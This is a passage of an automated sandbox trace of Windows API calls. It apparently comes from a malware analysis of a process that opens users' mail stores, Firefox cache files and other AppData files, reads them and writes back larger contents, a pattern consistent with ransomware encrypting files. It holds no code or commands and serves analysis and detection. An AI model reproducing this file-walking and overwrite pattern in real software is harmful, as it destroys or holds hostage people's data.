WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.243] ReleaseMutex (hMutex=0x168) returned 1 [0174.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Outlook.sharing.xml.obi", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0174.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Outlook.sharing.xml.obi", cchWideChar=23, lpMultiByteStr=0x1f8867c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Outlook.sharing.xml.obi", lpUsedDefaultChar=0x0) returned 23 [0174.243] ReadFile (in: hFile=0x20c, lpBuffer=0x1ee0848, nNumberOfBytesToRead=0xb9, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee0848*, lpNumberOfBytesRead=0x311f2bc*=0xb9, lpOverlapped=0x0) returned 1 [0174.244] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0174.244] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x641, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x311f2d0*=0x641, lpOverlapped=0x0) returned 1 [0174.245] CloseHandle (hObject=0x20c) returned 1 [0174.245] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.msmessagestore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0174.249] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0174.249] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x206000 [0174.249] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0174.249] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.249] ReleaseMutex (hMutex=0x168) returned 1 [0174.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMail.MSMessageStore", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0174.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMail.MSMessageStore", cchWideChar=26, lpMultiByteStr=0x1f8fc6c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMail.MSMessageStore", lpUsedDefaultChar=0x0) returned 26 [0174.249] ReadFile (in: hFile=0x20c, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0174.284] ReadFile (in: hFile=0x20c, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0174.314] ReadFile (in: hFile=0x20c, lpBuffer=0x2840938, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0x2000, lpOverlapped=0x0) returned 1 [0174.314] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x204000 [0174.314] ReadFile (in: hFile=0x20c, lpBuffer=0x2840938, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0x2000, lpOverlapped=0x0) returned 1 [0174.343] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x204000 [0174.344] WriteFile (in: hFile=0x20c, lpBuffer=0x284a9c8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x284a9c8*, lpNumberOfBytesWritten=0x311f28c*=0x2588, lpOverlapped=0x0) returned 1 [0174.345] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0174.345] WriteFile (in: hFile=0x20c, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.346] WriteFile (in: hFile=0x20c, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.346] WriteFile (in: hFile=0x20c, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x311f28c*=0x2000, lpOverlapped=0x0) returned 1 [0174.346] CloseHandle (hObject=0x20c) returned 1 [0174.347] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0174.347] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0174.347] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xed [0174.347] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0174.347] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.347] ReleaseMutex (hMutex=0x168) returned 1 [0174.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Green Bubbles.htm", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0174.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Green Bubbles.htm", cchWideChar=17, lpMultiByteStr=0x1f8867c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Green Bubbles.htm", lpUsedDefaultChar=0x0) returned 17 [0174.347] ReadFile (in: hFile=0x20c, lpBuffer=0x1ea4da8, nNumberOfBytesToRead=0xed, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4da8*, lpNumberOfBytesRead=0x311f2bc*=0xed, lpOverlapped=0x0) returned 1 [0174.348] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0174.348] WriteFile (in: hFile=0x20c, lpBuffer=0x28469b8*, nNumberOfBytesToWrite=0x675, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28469b8*, lpNumberOfBytesWritten=0x311f2d0*=0x675, lpOverlapped=0x0) returned 1 [0174.349] CloseHandle (hObject=0x20c) returned 1 [0174.349] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0174.349] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0174.349] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x204000 [0174.349] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0174.350] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.350] ReleaseMutex (hMutex=0x168) returned 1 [0174.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMail.MSMessageStore", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0174.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMail.MSMessageStore", cchWideChar=26, lpMultiByteStr=0x1f8fc3c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMail.MSMessageStore", lpUsedDefaultChar=0x0) returned 26 [0174.350] ReadFile (in: hFile=0x20c, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0174.415] ReadFile (in: hFile=0x20c, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0174.422] ReadFile (in: hFile=0x20c, lpBuffer=0x288f948, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x311f278*=0x2000, lpOverlapped=0x0) returned 1 [0174.447] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x202000 [0174.447] ReadFile (in: hFile=0x20c, lpBuffer=0x2840938, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0x2000, lpOverlapped=0x0) returned 1 [0174.458] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x202000 [0174.459] WriteFile (in: hFile=0x20c, lpBuffer=0x25abd08*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25abd08*, lpNumberOfBytesWritten=0x311f28c*=0x2588, lpOverlapped=0x0) returned 1 [0174.460] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0174.460] WriteFile (in: hFile=0x20c, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.461] WriteFile (in: hFile=0x20c, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.461] WriteFile (in: hFile=0x20c, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x311f28c*=0x2000, lpOverlapped=0x0) returned 1 [0174.461] CloseHandle (hObject=0x20c) returned 1 [0174.462] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\10\\16a09d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0174.463] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0174.463] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x534f [0174.463] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0174.463] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.463] ReleaseMutex (hMutex=0x168) returned 1 [0174.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="16A09d01", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0174.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="16A09d01", cchWideChar=8, lpMultiByteStr=0x1f7346c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="16A09d01", lpUsedDefaultChar=0x0) returned 8 [0174.463] ReadFile (in: hFile=0x20c, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0174.466] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x434f [0174.466] ReadFile (in: hFile=0x20c, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0174.467] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x434f [0174.467] WriteFile (in: hFile=0x20c, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0174.467] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0174.467] WriteFile (in: hFile=0x20c, lpBuffer=0x25add38*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25add38*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0174.467] CloseHandle (hObject=0x20c) returned 1 [0174.467] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\f0\\ecb2dd01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0174.472] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0174.472] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xa80f [0174.472] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0174.472] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.472] ReleaseMutex (hMutex=0x168) returned 1 [0174.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ECB2Dd01", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0174.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ECB2Dd01", cchWideChar=8, lpMultiByteStr=0x1f7328c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ECB2Dd01", lpUsedDefaultChar=0x0) returned 8 [0174.473] ReadFile (in: hFile=0x20c, lpBuffer=0x3d1bb28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x3d1bb28*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0174.474] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x980f [0174.475] ReadFile (in: hFile=0x20c, lpBuffer=0x2667868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0174.475] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x980f [0174.476] WriteFile (in: hFile=0x20c, lpBuffer=0x25abd08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25abd08*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0174.476] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0174.476] WriteFile (in: hFile=0x20c, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0174.476] CloseHandle (hObject=0x20c) returned 1 [0174.476] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0174.477] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0174.477] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x2c [0174.477] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0174.477] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.477] ReleaseMutex (hMutex=0x168) returned 1 [0174.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="test-phish-simple.cache", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0174.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="test-phish-simple.cache", cchWideChar=23, lpMultiByteStr=0x1f8867c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="test-phish-simple.cache", lpUsedDefaultChar=0x0) returned 23 [0174.477] ReadFile (in: hFile=0x20c, lpBuffer=0x1fa54d8, nNumberOfBytesToRead=0x2c, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fa54d8*, lpNumberOfBytesRead=0x311f2bc*=0x2c, lpOverlapped=0x0) returned 1 [0174.478] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0174.479] WriteFile (in: hFile=0x20c, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5b4, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x311f2d0*=0x5b4, lpOverlapped=0x0) returned 1 [0174.479] CloseHandle (hObject=0x20c) returned 1 [0174.479] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.status"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0174.481] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0174.481] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xc [0174.481] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0174.481] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.481] ReleaseMutex (hMutex=0x168) returned 1 [0174.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="update.status", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0174.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="update.status", cchWideChar=13, lpMultiByteStr=0x1f733cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="update.status", lpUsedDefaultChar=0x0) returned 13 [0174.482] ReadFile (in: hFile=0x20c, lpBuffer=0x1f7ad58, nNumberOfBytesToRead=0xc, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f7ad58*, lpNumberOfBytesRead=0x311f2bc*=0xc, lpOverlapped=0x0) returned 1 [0174.482] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0174.483] WriteFile (in: hFile=0x20c, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x594, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x311f2d0*=0x594, lpOverlapped=0x0) returned 1 [0174.483] CloseHandle (hObject=0x20c) returned 1 [0174.483] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0174.484] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0174.484] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x58b [0174.484] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0174.484] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.484] ReleaseMutex (hMutex=0x168) returned 1 [0174.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", cchWideChar=65, lpMultiByteStr=0x0, 